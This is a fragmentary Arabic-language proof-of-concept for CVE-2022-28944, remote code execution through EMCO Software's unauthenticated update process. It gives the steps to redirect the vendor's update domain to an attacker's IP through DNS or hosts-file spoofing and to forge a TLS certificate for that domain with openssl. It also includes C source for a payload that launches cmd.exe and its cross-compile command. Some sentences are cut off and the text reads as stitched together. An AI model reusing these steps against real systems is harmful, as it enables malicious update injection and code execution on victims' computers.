
إثبات مفهوم لاستغلال تنفيذ الأوامر عن بُعد دون مصادقة في منتجات برمجيات EMCO عبر تزوير DNS وحقن تحديثات خبيثة.
ثغرة تنفيذ تعليمات برمجية عن بُعد في تحديث غير مُصادق عليه لمنتجات متعددة من EMCO Software.
الاستخدام: python3 cve-2022-28944_poc.py
التفاصيل في التقرير على gerr.re.
storage.emcosoftware.com ليشير إلى عنوان IP الخاص بالمهاجم؛
c:\windows\system32\drivers\etc\hosts على الجهاز المستهدف.
proof.c على جهاز المهاجم، على سبيل المثال باستخدام i686-w64-mingw32-gcc proof.c -o proof.exe؛#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"